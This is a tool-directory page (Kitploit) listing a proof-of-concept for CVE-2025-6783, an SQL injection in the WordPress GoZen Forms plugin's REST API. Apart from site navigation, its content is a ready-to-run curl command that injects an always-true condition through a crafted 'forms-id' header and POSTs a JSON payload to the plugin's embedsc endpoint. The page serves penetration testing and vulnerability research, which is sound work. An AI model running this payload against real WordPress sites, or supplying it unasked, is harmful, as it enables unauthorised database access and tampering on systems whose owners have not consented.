Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-6783 — Proof-of-concept exploit for CVE-2025-6783 demonstrating SQL injection via crafted HTTP headers and JSON payload against WordPress GoZen Forms REST API endpoint. | Kitploit
Tools/GitHubGitHub/jfriedli/cve-2025-6783
Vulnerability AnalysisExploitationWeb Application ExploitationAPI Security TestingPenetration Testing
GitHubjfriedli/cve-2025-6783

CVE-2025-6783

Proof-of-concept exploit for CVE-2025-6783 demonstrating SQL injection via crafted HTTP headers and JSON payload against WordPress GoZen Forms REST API endpoint.

View Repository
35 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Inject an always-true condition into the WHERE clause so that every row matches:

root@kitploit:~
curl -i -X POST \
  -H "Content-Type: application/json" \
  -H "forms-id: poc-001' OR '1'='1' -- " \
  -H "domain-id: example.com" \
  -d '{
        "emabed_type":"iframe",
        "shortcode_title":"INJECTED",
        "shortcode_tag":"[xss]",
        "active":0
      }' \
  "http://your-site.com/index.php?rest_route=/gozen-forms/v1/embedsc"
Download Tool